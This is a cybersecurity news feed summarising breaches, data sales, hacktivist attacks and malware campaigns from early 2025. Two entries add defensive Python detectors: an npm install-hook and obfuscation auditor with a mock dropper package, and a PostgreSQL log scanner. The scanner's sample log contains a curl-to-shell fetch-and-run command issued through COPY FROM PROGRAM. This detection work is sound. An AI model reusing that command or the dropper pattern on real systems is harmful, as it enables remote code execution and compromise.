Breaking Cyber News From Cyberint
Breaking news feed of the latest cyber incidents, breaches, vulnerabilities, malware, ransomware and so much more.
-
Apr 10, 2025
Endesa Energía XXI - Breach - 2025-04-05
The threat actor known as DonaldDump claims to have breached Energía XXI, the Spanish energy retailer belonging to Endesa, and is selling a database of 4,015,311 records for $7,500. According to the post, the data includes national ID numbers (DNI), full names, phone numbers, postal addresses, email addresses, IBANs and electricity/gas supply point identifiers (LUZCUPS or GASCUPS). Every record reportedly carries a bank account number (IBAN), which makes the set directly usable for direct-debit fraud and targeted phishing.
-
Apr 10, 2025
Threat Actor Satanic Leaks Magento CRM Data of 745,000 Users
On April 9, 2025, the threat actor known as "Satanic" leaked data allegedly stolen from a third-party vendor of Magento. According to the actor, around 745,000 user records were taken, including roughly 430,000 email addresses and 261,000 phone numbers linked to major global companies, a combination well suited to targeted phishing and fraud.
-
Apr 10, 2025
Threat Actors Claim Breach of Iran's Largest Telecommunications Company
In April 2025, the threat actor group Shadowbits claimed to have breached Hamrahe Avval (MCI), Iran's largest mobile operator, and to have gained access to its database. According to the group, a substantial amount of MCI customer data was taken, including full names, fathers' names, places of birth, gender, national ID numbers, addresses, postal codes, dates of birth, mobile numbers and SIM card details.
-
Apr 10, 2025
Exploitation of Windows Zero-Day Leads to Ransomware Attacks
Microsoft has disclosed that a zero-day vulnerability in the Windows Common Log File System (CLFS) driver, tracked as CVE-2025-29824 and patched in the April 2025 security update, was exploited in targeted ransomware attacks against organizations in the IT, real estate, finance and retail sectors across the United States, Venezuela, Spain and Saudi Arabia. Microsoft attributes the activity to the group it tracks as Storm-2460, which used the PipeMagic backdoor to stage the exploit and the ransomware payload; the initial access vector is still under investigation. The flaw is a local privilege escalation (a use-after-free in clfs.sys), so it does not grant initial access on its own: once the attackers had a foothold as a low-privileged user, it let them obtain SYSTEM privileges, dump credentials and deploy ransomware across the compromised environment. Patching the CLFS driver removes that step, but an unpatched host that already runs PipeMagic should be treated as fully compromised.
-
Apr 09, 2025
Threat Actor Claims Breach of 8 Mexican Education Institutes
In April 2025, the threat actor "marssepe" claimed to have breached eight Mexican education institutes and to have access to their internal databases, including student, teacher and administrative staff records.
-
Apr 09, 2025
New Cyber Attacks Target Ukrainian Institutions with an Infostealer
The Computer Emergency Response Team of Ukraine (CERT-UA) has reported a series of cyber attacks against Ukrainian institutions, particularly military and law enforcement bodies near the eastern border. The attacks use phishing emails carrying macro-enabled Excel spreadsheets that drop two payloads: a PowerShell script that opens a reverse shell, and a new stealer named GiftedCrook that harvests data from web browsers. The emails are sent from previously compromised accounts so that they appear legitimate. CERT-UA attributes the activity to the cluster it tracks as UAC-0226.
-
Apr 06, 2025
North Korean Lazarus Group Expands Malicious npm Campaign
The North Korean Lazarus Group has intensified its campaign against the npm ecosystem by publishing new packages that deliver the BeaverTail infostealer and a remote access trojan (RAT) loader. The packages pose as legitimate utilities and rely on heavy obfuscation to evade detection. Targets are lured into installing them under the guise of job interviews; the goal is to infiltrate developer systems, steal sensitive data and keep long-term access to the compromised machines. Security researchers have identified several new npm packages tied to the campaign, showing that the actors keep diversifying their lures and tooling to raise their success rate.
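The traits the entry describes, a package that looks like a utility but carries an obfuscated loader, can be screened for before `npm install` runs any lifecycle script. The audit below is an added example written for this page; it is not code from Cyberint, from the researchers who reported the campaign, or from any npm tool, and the two packages it inspects are constructed in memory (the base64 blob stands in for an encoded payload and is not a real sample). It flags install hooks in `package.json` and common obfuscation markers in the JavaScript, then combines them into a verdict, because any one marker on its own is common in benign code.

```python
"""Pre-install audit of an npm package for install hooks plus obfuscated
loader code. Added example for this page; not Cyberint's, the researchers'
or npm's code. Sample packages below are constructed, not real."""
import base64
import json
import math
import re
from collections import Counter

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SCRIPT_EXT = (".js", ".cjs", ".mjs")

# Traits typical of obfuscated droppers. Each is common in legitimate
# code on its own, so findings are scored together in verdict().
INDICATORS = {
    "dynamic_eval": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
    "child_process": re.compile(r"require\(\s*['\"]child_process['\"]\s*\)"),
    "hex_escapes": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "base64_decode": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)"),
    "long_opaque_literal": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}
STRING_LITERAL = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")


def shannon_entropy(s):
    """Bits per character; encoded payload blobs sit near 6, prose near 4."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def audit_package(files):
    """files maps relative path -> file text. Returns [(severity, detail), ...]."""
    findings = []
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in INSTALL_HOOKS:  # runs automatically during `npm install`
            findings.append(("high", f"install hook '{hook}': {cmd}"))
    for path, text in files.items():
        if not path.endswith(SCRIPT_EXT):
            continue
        for name, rx in INDICATORS.items():
            if rx.search(text):
                findings.append(("medium", f"{path}: {name}"))
        # The longest string literal is where a packed payload usually lives.
        literals = [a or b for a, b in STRING_LITERAL.findall(text)]
        longest = max(literals, key=len, default="")
        if len(longest) >= 100 and shannon_entropy(longest) > 4.8:
            findings.append(("medium", f"{path}: high_entropy_literal"))
    return findings


def verdict(findings):
    sev = {s for s, _ in findings}
    if "high" in sev and "medium" in sev:
        return "block"  # install hook plus obfuscated code: do not install
    return "review" if findings else "ok"


# Constructed sample packages (hypothetical names, not real registry entries).
BENIGN = {
    "package.json": json.dumps({"name": "tiny-left-pad", "version": "1.0.0",
                                "main": "index.js", "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (s, n, ch = ' ') => String(s).padStart(n, ch);\n",
}
_BLOB = base64.b64encode(bytes(range(256)) * 2).decode()  # stand-in for an encoded payload
SUSPICIOUS = {
    "package.json": json.dumps({"name": "crypto-utils-helper", "version": "1.0.3",
                                "main": "index.js",
                                "scripts": {"postinstall": "node lib/setup.js"}}),
    "index.js": "module.exports.sha256 = (s) => require('crypto').createHash('sha256').update(s).digest('hex');\n",
    "lib/setup.js": (
        'const cp = require("child_process");\n'
        r'const host = "\x68\x74\x74\x70\x73\x3a\x2f\x2f";' + "\n"
        f'const stage = Buffer.from("{_BLOB}", "base64").toString();\n'
        "eval(stage);\n"
    ),
}

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        found = audit_package(pkg)
        print(label, verdict(found), found)
```

In practice the same function would be run over the unpacked tarball from `npm pack` before the package is allowed into a lockfile, and `npm install --ignore-scripts` used while it is under review, since the install hook is the step that hands the loader execution.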
-
Apr 06, 2025
Emergence of Triada Malware in Counterfeit Android Devices
A new variant of the Triada malware has been found preloaded on counterfeit Android smartphones, affecting more than 2,600 users, most of them in Russia. Triada, a modular family first described in 2016, can steal sensitive information, tamper with device functions and enlist infected devices into a botnet. Because this variant ships in the device firmware, it is a hardware supply-chain compromise rather than an app-store infection, and a factory reset does not remove it. Recent analysis shows the variant intercepting messages and swapping cryptocurrency wallet addresses in the clipboard and in apps; it reportedly diverted about $270,000 in cryptocurrency to the attackers' wallets between June 2024 and March 2025.
-
Apr 03, 2025
Vortex Telegram Group Launches DDoS Attack on Poria Hospital Website
Hacktivists behind the Vortex Telegram group launched a DDoS attack on the website of Poria Hospital (poria.org.il), temporarily taking it offline. The site has since recovered and is currently active. The incident is one of a continuing series of attacks on Israeli online assets.
-
Apr 02, 2025
Hackers Exploit Voicemail to Hijack Telegram Accounts in Israel
Cybersecurity experts have warned of a surge in Telegram account hijackings targeting Israelis, with attackers abusing weakly protected voicemail boxes to gain unauthorized access to accounts. The Israeli Internet Association has reported a sharp rise in cases and links the activity to actors in Bangladesh and Indonesia. The method combines social engineering with technical loopholes and lets the attacker take over an account and lock the victim out. Two settings defeat it: a non-default voicemail PIN on the phone line, and Telegram's two-step verification password, which is required in addition to any code delivered by SMS or voice call.
-
Apr 02, 2025
Lucid: The New Phishing-as-a-Service Platform Targeting Global Entities
A new phishing-as-a-service (PhaaS) platform named Lucid has emerged, targeting 169 entities across 88 countries with smishing messages sent over Apple iMessage and Android RCS. Developed by a Chinese-speaking group known as the Xinxin group, Lucid uses these legitimate, end-to-end encrypted messaging channels to bypass carrier-level SMS filtering, enabling large-scale campaigns aimed at stealing payment card data and personally identifiable information. The platform provides automation for building customizable phishing sites, anti-detection techniques, and real-time monitoring of victim interactions. It is a further sign of how industrialized phishing operations have become.
-
Apr 02, 2025
Ongoing PostgreSQL Exploitation Campaign Targets Cryptocurrency Mining
A new campaign targeting internet-exposed PostgreSQL instances aims to gain unauthorized access and deploy cryptocurrency miners. The campaign, attributed to the threat actor known as Jinx-0126, has reportedly affected more than 1,500 victims, all compromised through weak or predictable database credentials rather than a software vulnerability. Researchers note that the actor uses evasion techniques such as unique hashes per binary and fileless execution of the miner payload. Once authenticated, the actor uses PostgreSQL's own ability to run operating-system commands from SQL to install the miner and establish persistence, so a superuser password is effectively a shell on the host.
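The two observable stages of this campaign, a burst of failed password logins followed by SQL that runs operating-system commands, both land in the PostgreSQL server log. The detector below is an added example written for this page, not code from Cyberint or from the researchers who reported the campaign. It assumes the log was written with `log_line_prefix = '%m [%p] %u@%d '` and `log_statement = 'all'` (otherwise statements are not logged), and it looks specifically for `COPY ... FROM/TO PROGRAM`, which is PostgreSQL's documented primitive for running a shell command as the database OS user; the entry does not name the exact statement the actor used, so treat that as an assumption about this campaign. The log lines are constructed.

```python
"""Detect credential guessing followed by COPY ... FROM PROGRAM in PostgreSQL
server logs. Added example for this page, not Cyberint's or the researchers'
code. Assumes log_line_prefix '%m [%p] %u@%d ' and log_statement = 'all'."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+) \S+ "  # timestamp, tz name
    r"\[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
    r"(?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)
AUTH_FAIL_RE = re.compile(r'password authentication failed for user "(?P<user>[^"]+)"')
# COPY ... FROM/TO PROGRAM executes the quoted command via the OS shell.
PROGRAM_RE = re.compile(
    r"\bCOPY\b.*?\b(?:FROM|TO)\s+PROGRAM\s+'(?P<cmd>(?:[^']|'')*)'",
    re.IGNORECASE | re.DOTALL,
)

# Constructed sample log: six guesses in half a second, a success, then
# OS command execution through SQL, then an unrelated application query.
SAMPLE_LOG = """\
2025-04-01 10:00:01.001 UTC [4101] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:00:01.105 UTC [4102] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:00:01.210 UTC [4103] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:00:01.315 UTC [4104] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:00:01.420 UTC [4105] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:00:01.525 UTC [4106] postgres@postgres FATAL:  password authentication failed for user "postgres"
2025-04-01 10:00:02.000 UTC [4107] postgres@postgres LOG:  connection authorized: user=postgres database=postgres
2025-04-01 10:00:02.300 UTC [4107] postgres@postgres LOG:  statement: COPY cmd_exec FROM PROGRAM 'curl -s http://203.0.113.7/x.sh | sh'
2025-04-01 10:00:02.400 UTC [4107] postgres@postgres LOG:  statement: DROP TABLE IF EXISTS cmd_exec
2025-04-01 10:05:00.000 UTC [4200] app@inventory LOG:  statement: SELECT id, qty FROM stock WHERE id = 42
"""


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S.%f")
    return rec


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def failed_auth_bursts(records, threshold=5, window=timedelta(seconds=60)):
    """{user: most failures seen inside any `window`} for users at or above threshold."""
    times = defaultdict(list)
    for r in records:
        m = AUTH_FAIL_RE.search(r["msg"])
        if r["level"] == "FATAL" and m:
            times[m["user"]].append(r["ts"])
    bursts = {}
    for user, ts in times.items():
        ts.sort()
        start, best = 0, 0
        for end in range(len(ts)):  # sliding window over sorted timestamps
            while ts[end] - ts[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            bursts[user] = best
    return bursts


def program_copies(records):
    """Statements that invoke COPY ... FROM/TO PROGRAM, with the shell command."""
    hits = []
    for r in records:
        if not r["msg"].startswith("statement:"):
            continue
        m = PROGRAM_RE.search(r["msg"])
        if m:
            hits.append({"pid": r["pid"], "user": r["user"], "db": r["db"],
                         "cmd": m["cmd"].replace("''", "'")})
    return hits


def scan(text, threshold=5):
    records = parse_log(text)
    bursts = failed_auth_bursts(records, threshold)
    copies = program_copies(records)
    # A role that was brute-forced and then ran OS commands is the campaign's shape.
    correlated = sorted({c["user"] for c in copies if c["user"] in bursts})
    return {"auth_bursts": bursts, "program_copies": copies, "correlated_users": correlated}


if __name__ == "__main__":
    for key, value in scan(SAMPLE_LOG).items():
        print(key, value)
```

The prevention side is simpler than the detection: do not expose port 5432 to the internet, require strong passwords with `scram-sha-256` in `pg_hba.conf`, and do not grant application roles superuser or the `pg_execute_server_program` role, since that is what `COPY ... FROM PROGRAM` requires.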
-
Apr 01, 2025
Threat Actor Claims to Have Breached Royal Mail Group
On March 31, 2025, the threat actor GHNA leaked 144 GB of data from Royal Mail Group, including customer information, internal documents and Zoom meeting recordings. The leak exposed personally identifiable information (PII) such as names, addresses and parcel details, as well as confidential communications between Royal Mail Group and its supplier Spectos. It also contained a WordPress SQL database for mailagents.uk, Mailchimp mailing lists and datasets of delivery and post office locations. In total the dump consists of 293 folders and 16,549 files.
-
Mar 31, 2025
Samsung Electronics Germany Data Breach
In March 2025, Samsung Electronics Germany suffered a data breach in which more than 270,000 customer service tickets were leaked on BreachForums. The tickets contain customers' personal information (PII), including full names, addresses, email addresses and order numbers. The leak is attributed to the threat actor GHNA, who posted the data on the forum for free download.
-
Mar 31, 2025
Crocodilus: A New Android Banking Trojan Targeting Spain and Turkey
Cybersecurity researchers have identified a new Android banking trojan named Crocodilus that currently targets users in Spain and Turkey. It is not a rebrand of an existing family: it ships with remote control of the device, black screen overlays that hide the operator's actions from the victim, and extensive data harvesting through accessibility-service logging. The malware poses as a Google Chrome app and, once installed, requests accessibility permissions, then contacts its command-and-control server for instructions. It overlays fake login screens on financial apps to capture credentials, and it targets cryptocurrency wallets with a social-engineering prompt that pressures the user into revealing their seed phrase. Monitoring of app launches, screen capture and concealment of its own activity round out a capability set that marks a clear step up in mobile banking threats. The accessibility permission is the lynchpin: a Chrome app has no reason to ask for it.
-
Mar 30, 2025
PJobRAT Malware Targets Taiwanese Users Through Chat Apps
PJobRAT, an Android malware previously used against Indian military personnel, has resurfaced in a campaign targeting Taiwanese users by masquerading as chat applications. It can steal SMS messages, contacts and media files from infected devices. The latest campaign used malicious apps named SangaalLite and CChat, distributed from several WordPress sites, and ran for nearly two years before activity stopped in October 2024. The small number of infections points to a targeted operation in which social engineering persuaded specific users to install the apps.
-
Mar 30, 2025
Morphing Meerkat - New Phishing-as-a-Service Campaign
Cybersecurity researchers have uncovered a phishing-as-a-service (PhaaS) platform run by a threat actor known as Morphing Meerkat that uses DNS mail exchange (MX) records to serve fake login pages for around 114 brands. The actor distributes phishing emails through open redirects on adtech infrastructure and compromised domains, typically landing victims on pages hosted on Cloudflare R2. When a victim arrives, the kit looks up the MX record of the victim's email domain, identifies the mail provider behind it and loads a matching login page, so a Gmail user sees a Google-styled page and a Microsoft 365 user an Outlook-styled one. The kit also translates its content into multiple languages on the fly and includes anti-analysis techniques that hinder detection. Tailoring the page to the real provider is what raises the credential-theft rate over generic kits.
-
Mar 26, 2025
DieNet Claims Breach of Australian Real Estate Company McGrath
On March 25, 2025, the hacktivist group "DieNet" claimed responsibility for breaching McGrath, one of Australia's largest real estate companies. The group claims to have taken the company's entire database, including employee information, customer details and business financial data such as receipts and revenue figures, and says it will publish personal information of hundreds of real estate companies and individuals. It cites Australia's alliance with the United States and support for Trump as its motivation.
-
Mar 23, 2025
Anonymous 71 Claims Attack on 10 Israeli Sites
On March 23, 2025, the hacktivist group Anonymous 71 claimed to have taken down 10 websites, 8 of them in Israel. The affected sites belong to companies in the entertainment, business services and social services sectors. The group published evidence of its DDoS attacks.
-
Mar 19, 2025
Luxury-Watches - Breach - 2025-03-17
The threat actor "HillShave" has leaked a database belonging to Luxury-Watches France, a Nice/Paris-based website selling high-end watches and diamonds. According to the actor, the database holds roughly 100 to 200 unique email addresses and names.
-
Mar 19, 2025
Threat Actor "CoreInjection" Sells Access To Israeli Digital Display Company
On March 18, 2025, the threat actor CoreInjection claimed to hold exclusive access to a prominent Israel-based company that provides digital display solutions for shopping malls. The access is said to cover 17 Windows servers, administrative permissions in the company's management systems, and direct entry to the central server that manages the display inventory, which would allow immediate control of on-screen content across all displays. The actor also advertised high-speed connectivity suited to bulk data exfiltration. The asking price is $100,000, payable only in cryptocurrency. On the same day, a digital banner in an Israeli mall was hijacked to show the message "Defaced by Coreinjection, Clal pay the ransom", which suggests the display access is being used to pressure Clal Insurance, a previous target claimed by the same actor.
-
Mar 18, 2025
Threat Actor Sells Access To Israeli Automotive Company
On March 16, 2025, the threat actor group CoreInjection claimed to have gained full access to the internal network and management email systems of a prominent international car company operating in Israel. The breach includes control over the company’s Israeli network infrastructure and direct access to high-level executive and managerial email accounts. The group is offering this access for sale at $50,000 USD.
-
Mar 18, 2025
Threat Actor Claims to Have Breached Clal Insurance, Offers Database for $200,000
On March 17, 2025, the threat actor CoreInjection claimed to have stolen 400,000 customer policies and sensitive files from Clal Insurance, one of Israel's largest insurers. The dataset is said to contain detailed policy information for 400,000 customers together with personally identifiable information (PII), financial data and other confidential records. The actor is offering it for $200,000, payable only in cryptocurrency.
-
Mar 17, 2025
Sale of Admin Access to U.S. Industrial Firm Revealed on Dark Web
A threat actor known as "CoreInjection" recently posted on the dark web forum "BreachForums" offering exclusive administrative command-line interface (CLI) and shell access to a major U.S.-based industrial machinery and equipment company. The sale, priced at $100,000, grants full administrative privileges to the company's remote management system, which could allow threat actors deep control over critical systems.
-
Mar 17, 2025
New Android Spyware KoSpy Linked to North Korean Threat Actor ScarCruft
The North Korea-linked threat actor ScarCruft (APT37) has been identified as the developer of KoSpy, a new Android surveillance tool aimed at Korean- and English-speaking users. Active since March 2022, the malware posed as legitimate utility apps on the Google Play Store to get users to install it. KoSpy collects extensive data from infected devices, including SMS messages, call logs and location, and uses a multi-stage command-and-control setup that lets it operate quietly. Its plugins and configurations remain largely unknown because the command servers are now inactive or unresponsive.
-
Mar 16, 2025
Hacktivist Groups Claim To Have Breached Israeli Web Hosting Server and to Have Deleted 12 Israeli Websites
On March 14th, 2025, the hacktivist groups "LulzSec Black" and "Jokeir 07x" claimed to have gained access to an Israeli web hosting server and as a result, taken down 12 Israeli Sites, among those sites,
-
Mar 16, 2025
Ransomware Group Babuk2 Claims to Have Attacked the Knesset
On March 15, 2025, the ransomware group "Babuk2" claimed to have attacked the Knesset, Israel's parliament, and to have exfiltrated 910 GB of internal data comprising more than 200,000 documents. Babuk2 is offering the data for sale and has published a portion of it on its data leak site (DLS).
-
Mar 13, 2025
Threat Actor Claims to Have Breached TurkNet
In March 2025, a threat actor named hades_hgs claimed to have breached TurkNet, a telecommunications company in Türkiye, and to have gained access to its database. According to the actor, approximately 2.8 million rows of TurkNet customer data were taken, including customer IDs, contact details, addresses, usernames and identification numbers.
-
Mar 13, 2025
Threat Actor Claims to Have Breached the National Telecommunications Commission (NTC) of the Philippines
In March 2025, a threat actor named LuxurySp1d3r claimed to have breached the National Telecommunications Commission (NTC) of the Philippines and to have gained access to its database. According to the threat actor, a critical dataset belonging to the NTC was taken, including sensitive information related to nationwide telecommunications operations, surveillance mechanisms, and user tracking systems.
-
Mar 13, 2025
Chinese Espionage Group Targets Juniper Routers with Custom Backdoors
The China-nexus cyber espionage group tracked as UNC3886 has been observed deploying custom backdoors on Juniper Networks routers. The backdoors can disable logging and maintain persistent remote access, and several of them circumvent Junos OS's Veriexec file-integrity protection so that unsigned code can run. The group previously exploited zero-day vulnerabilities in Fortinet, Ivanti and VMware products. The latest activity, identified in mid-2024, uses multiple distinct backdoors built on the TINYSHELL framework and reflects deep knowledge of the devices' internals and a focus on stealth and long-term persistence. Organizations are advised to upgrade affected Juniper devices to current Junos OS images and run Juniper's malware removal tool (JMRT) to verify device integrity.
-
Mar 12, 2025
Data Breach Announcement: UNSS France (7.7M Citizens & 10.5K Educational Institutions)
The threat actor "vorvitz_5" has announced a breach of data on 7.7 million French citizens held by the UNSS (National Union of School Sports), exposing gender, full names, dates of birth, personal and parental email addresses and phone numbers. The breach also covers about 10,500 educational institutions, with institutional identifiers, administrative contacts, phone and fax numbers, postal codes and banking details (IBAN, BIC). The actor is offering the data for sale and has posted sample files on the underground forum BreachForums.
-
Mar 12, 2025
Sidewinder APT Targets Maritime and Nuclear Sectors in Asia and Africa
The advanced persistent threat (APT) group Sidewinder has been targeting maritime and logistics companies as well as nuclear energy infrastructure across South and Southeast Asia, the Middle East and Africa. In activity observed by Kaspersky in 2024, the group hit targets in countries including Bangladesh, Cambodia, Djibouti, Egypt, the UAE and Vietnam, with a particular focus on diplomatic entities. Sidewinder relies on spear-phishing and exploitation of known, unpatched vulnerabilities (CVE-2017-11882 in Microsoft Office's Equation Editor among them) to gain a foothold, maintain persistence and evade detection.
-
Mar 12, 2025
Jaguar Land Rover Data Breach Exposes Sensitive Internal Documents and Employee Information
In March 2025, Jaguar Land Rover, a global automaker with reported revenue of $29.9 billion, suffered a significant data breach. The leak involves around 700 internal documents, including confidential files, development logs, tracking data and source code, together with an employee dataset exposing usernames, email addresses, display names and time zones. The data was posted on the underground forum BreachForums by the threat actor known as "Rey".
-
Mar 12, 2025
Threat Actor Publishes a Dataset of 150K Israeli Emails and Passwords
On March 12, 2025, in an underground chat group devoted to circulating stolen data, a threat actor published two datasets of Israeli citizens: one containing 150,000 email addresses under the .il TLD together with passwords, the other apparently containing credit card information.